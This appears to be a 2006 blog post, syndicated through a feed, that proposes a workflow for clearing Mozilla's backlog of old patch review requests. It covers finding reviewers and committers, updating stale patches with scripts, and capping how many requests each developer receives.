    1. Building a list of people with CVS access, who are alive, and what email addresses, IRC names, and Bugzilla accounts they have, plus what time zone's they're in and such, possibly other ways to contact them. also figuring out if people are on vacation. The reason for this is that you don't want to say the wrong thing to the wrong person, if a person doesn't have CVS access they shouldn't be asked why they didn't commit something, instead someone should be found who can, is available, and asked to do the commit.
    2. Build a list of people who really are module peers or actively work in a module. Build a list of people who are gone, and find out who replaced them. Note that such tasks can be done incrementally (by limiting which areas the later items in this list are done in).
    3. Working through the request queue checking old patches to see what happened and what's next.
      1. Determine if the bug is already fixed.
      2. Determine if the patch is still useful even if the bug is already fixed - in this case, probably filing a new bug with an updated copy of the patch and annotating the old bug/patch with the new bug number.
      3. Determine if the patch still applies, if not, there are scripts that can be used to convert the patch into one that does (this is obviously a more technical task than some of the others). If the person isn't comfortable doing updates to patches, it should be sufficient to flag the patches with a note that they don't apply so that some later person looking through things will know what needs to be done and could do it. <http://viper.haque.net/~timeless/patchtools/> has tools mergePcvs and related which can be used to update a patch. Similarly if someone has complained that there isn't enough context in a patch, this is something that can easily be done using patch2cvs and another cvs diff / cvsdo diff with whatever flags the complainer asked for.
    4. If the patch has no specifically requested reviewer, find someone (see notes above about limiting the number of emails that should be given to a single developer).
    5. If the patch requests review or equivalent from someone who is gone, find someone who isn't gone.
    6. If the patch needs super review and doesn't have it, but does have review, find a super reviewer for it.
    7. If the patch has all reviews and the tree is open, find someone to do the commit (keeping in mind whether the patch author has CVS access).
    8. (and these aren't in a particularly good order) if the patch got r+sr with "please make <blah simple change>", make the changes, test them and post the new patch and arrange for it to be committed. -- i.e. don't expect contributors, new, old, gone, lost, or busy to have time to address small things. If the changes are too hard for the person involved, there's a mentor who can either help the person learn how to do them, or who can help the person find someone else who can do them (again, limit the number of requests made per week per person, and try to spread them around).
    9. If there's a request pending from someone who is alive and still associated with the community, contact that person privately (using the lists from earlier) and ask what can be done to get the patch reviewed. Again, limit the number of requests per person per day/week, be aware of people on vacation. Probably not more than 2 requests per person per week, maybe fewer, but possibly a couple of pings each week -- not too pushy, but, these patches have been waiting around for years, so the excuse that developers "didn't have time" really doesn't hold water.

    Footnotes

    1. There should be a limit to the number of requests made of a single person, not more than 3 at a time, not more than 7 a week. i.e. If I've filed 100 bugs in a component, and each of those bugs resulted in someone asking me a question, I don't want to wake up one morning and see 100 emails asking me for information.
    2. IMHO, It is important for this person to be publicly employed by Mozilla Foundation (probably not even Mozilla Corporation) to give this person enough authority when interacting with contributors of all kinds (new, established, old, employed).
    0 Add to favourites0 Bury]]>     timeless - <timeless@gmail.com> feed:b60f2338d7a5b72897d3a13b738ecf26 Tue, 18 Jul 2006 12:16:00 +0000 http://maemo.org/midcom-permalink-38ee7e9a393411ddb2e991091f51a00aa00a